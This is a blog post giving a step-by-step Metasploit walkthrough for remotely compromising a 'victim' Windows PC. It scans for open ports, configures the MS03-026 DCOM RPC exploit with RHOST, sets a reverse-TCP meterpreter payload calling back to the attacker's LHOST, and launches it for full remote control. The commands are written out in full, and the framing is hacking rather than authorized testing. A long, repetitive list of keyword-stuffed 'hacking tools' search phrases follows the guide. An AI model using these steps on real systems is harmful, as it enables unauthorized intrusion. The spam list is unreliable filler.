Friday, August 28, 2020

HOW TO HACK A PC REMOTELY WITH METASPLOIT?

Metasploit is an advanced hacking tool that comes itself with a complete lack of advanced penetration testing tools. Penetration testers and hackers are taking so much advantage of this tool. It's a complete hack pack for a hacker that he can play almost any attack with it. I am not covering attacks in this article but I am going to share about how to hack a PC remotely with Metasploit. It's not so complicated if you pay attention to. It just needs a better understanding of each step you're performing. Let's move on how to do it.

SO, HOW TO HACK A PC REMOTELY WITH METASPLOIT?

REQUIREMENTS

Before getting started, make sure you have all the following things required to hack a PC remotely with Metasploit.
  • Linux Machine (Kali Linux or BackTrack 5)
  • Metasploit (Built in the mentioned Linux OS)
  • Windows PC victim

STEPS TO FOLLOW

Let's move on how to perform the complete attack.
  • Start your Linux OS and open up Nmap and run a scan for your victim remote server. Like we have our victim on remote server 192.168.42.129. It will show up the range of all open ports of the victim machine as you can see below.
  • We can see the open port here is 135. So, now we go to Metasploit and try to exploit and gain access to it. To open up, navigate to Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole.
  • After the initialization of msfconsole, standard checks, we will see the window like below.
  • Now, as we already know that our port 135 is open so, we search for a related RPC exploit in Metasploit. You can check out all the exploit list supported by Metasploit by using command 'show exploits'.
  • Now to activate an exploit, type the "use " with the exploit name like "use exploit/windows/dcerpc/ms03_026_dcom".
  • As we're in our required exploit environment, we need to configure the exploit according to our scenario. To check out the list of all the available options of an exploit, we can use command "show options". As we already know about the open port RPORT is 135. So, we just need to set our RHOST which we can set simply using the "set RHOST" command. Just type "set RHOST 192.168.42.129" and it's done.
  • Now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the "show payloads" command.
  • Every payload can be used for a different scenario. In our case, we are using the reverse TCP meterpreter which can be set using the command, "set PAYLOAD windows/meterpreter/reverse_tcp" for remote shell and then use "show options" command to view the options for it.
  • Here we notice LHOST for out payload is not set, so we set it out to our Public IP i.e. 192.168.42.128 using the command "set LHOST 192.168.42.128".
  • Now exploit is configured and ready to launch. Now simply use "exploit" command to launch the attack. If exploit is executed successfully, we will see the message like below.
  • Now that a reverse connection has been set up between the victim and our machine, we have complete control of the server.  To find out all the commands to play with the victim machine, we can use the "help".

We have successfully gained access to a remote PC with Metasploit. That's all how to hack a PC remotely with Metasploit. Hope it will work for you.
More info
  1. Hacking Tools For Pc
  2. Pentest Tools Linux
  3. Tools 4 Hack
  4. Hacker Tools For Windows
  5. Hacking Tools Hardware
  6. Hacker Tools Apk Download
  7. Hack Tools For Windows
  8. Hacking Tools For Kali Linux
  9. Pentest Tools Alternative
  10. Hacking Tools Free Download
  11. Pentest Tools Download
  12. Best Pentesting Tools 2018
  13. Pentest Tools Find Subdomains
  14. Hack App
  15. Pentest Reporting Tools
  16. Hacker Tools 2020
  17. Hackrf Tools
  18. Hacker Search Tools
  19. Pentest Tools Kali Linux
  20. Kik Hack Tools
  21. Hacking App
  22. Github Hacking Tools
  23. Best Pentesting Tools 2018
  24. Nsa Hack Tools Download
  25. Hacking Tools Windows
  26. Hacking Tools Github
  27. Hacker Hardware Tools
  28. Hacks And Tools
  29. Hacker Tools Apk Download
  30. Hacker Tools Online
  31. Hacking Tools Kit
  32. Physical Pentest Tools
  33. Pentest Tools Framework
  34. How To Hack
  35. Hack Tools For Ubuntu
  36. Hak5 Tools
  37. Hacking Tools For Beginners
  38. Nsa Hacker Tools
  39. What Are Hacking Tools
  40. Hack Tools Mac
  41. Pentest Tools Download
  42. Pentest Tools Linux
  43. How To Hack
  44. Hack Tools For Windows
  45. Hacker Tools Linux
  46. Hacker Tools Free Download
  47. Pentest Tools Port Scanner
  48. Pentest Tools Bluekeep
  49. World No 1 Hacker Software
  50. Termux Hacking Tools 2019
  51. Hacker Tools 2020
  52. Pentest Automation Tools
  53. Termux Hacking Tools 2019
  54. Hack Tools 2019
  55. Hacking Tools Hardware
  56. Pentest Tools Linux
  57. Hacker Tools For Mac
  58. Hack Tools For Ubuntu
  59. Hacking Tools Windows 10
  60. Hacking Tools For Pc
  61. Best Pentesting Tools 2018
  62. Hacking Tools For Kali Linux
  63. Hacking Tools
  64. Pentest Tools Windows
  65. Hacking Tools Hardware
  66. Hacking Tools Name
  67. Hack Apps
  68. Install Pentest Tools Ubuntu
  69. Hacker Tools Github
  70. Hacker
  71. What Is Hacking Tools
  72. Black Hat Hacker Tools
  73. Hacking Tools For Kali Linux
  74. Hacking Tools Windows 10
  75. Hacking Tools For Kali Linux
  76. Pentest Tools Framework
  77. Hacking Tools For Windows Free Download
  78. Hacking Tools Usb
  79. Github Hacking Tools
  80. Pentest Tools Alternative
  81. Usb Pentest Tools
  82. Hack Tool Apk No Root
  83. Pentest Tools Alternative
  84. Hacking Tools Windows
  85. Pentest Tools Windows
  86. Pentest Tools Tcp Port Scanner
  87. Termux Hacking Tools 2019
  88. Hacking Tools Online
  89. Hacker Tools Free
  90. Hacking Tools For Windows
  91. Hacker Tools Online
  92. Pentest Tools For Windows
  93. Hack Tools Pc
  94. Hack Tool Apk No Root
  95. Hacker
  96. Pentest Tools For Android
  97. What Are Hacking Tools
  98. Hack Tools For Ubuntu
  99. Hacking Tools Hardware
  100. Pentest Tools Apk
  101. Best Pentesting Tools 2018
  102. Pentest Tools Tcp Port Scanner
  103. Pentest Tools Subdomain
  104. Hacking Tools Pc
  105. Hacking Tools Mac
  106. Pentest Tools For Windows
  107. Pentest Tools For Ubuntu
  108. Nsa Hack Tools Download
  109. Physical Pentest Tools
  110. Best Pentesting Tools 2018
  111. Ethical Hacker Tools
  112. Pentest Tools Free
  113. Hack Rom Tools
  114. Easy Hack Tools
  115. Pentest Tools Bluekeep
  116. Free Pentest Tools For Windows
  117. Bluetooth Hacking Tools Kali
  118. Pentest Tools Linux
  119. Best Hacking Tools 2020
  120. How To Hack
  121. Hacker Security Tools
  122. Nsa Hack Tools Download
  123. Hackrf Tools
  124. Hacker Tools For Pc
  125. Pentest Tools Free
  126. Hacking Tools For Games
  127. Pentest Tools Windows
  128. Hacking Tools Mac
  129. Hacking Tools Usb
  130. Hacking Tools And Software
  131. Pentest Tools Kali Linux
  132. Hacking Tools Kit
  133. Pentest Tools Linux
  134. Github Hacking Tools
  135. Pentest Tools Kali Linux
  136. Hack Tools Pc
  137. Pentest Tools Url Fuzzer
  138. Easy Hack Tools
  139. Tools Used For Hacking
  140. Best Hacking Tools 2020
  141. Pentest Tools For Ubuntu
  142. Hacking Tools And Software
  143. Hacker Tools
  144. Pentest Tools Find Subdomains
  145. Pentest Tools Open Source
  146. Hacker Tools Apk Download
  147. Hacking Tools Download
  148. Pentest Recon Tools
  149. Hack App
  150. Hacker Tools Software
  151. Hack Tools Pc
  152. Hacking App
  153. Pentest Tools Review
  154. Pentest Tools Framework
  155. Hacking Tools Download
  156. Pentest Tools Online
  157. Hacking Tools Free Download
  158. Hacker Tools Online
  159. Hack Rom Tools
  160. Hack Tools
  161. Hacker Techniques Tools And Incident Handling

No comments: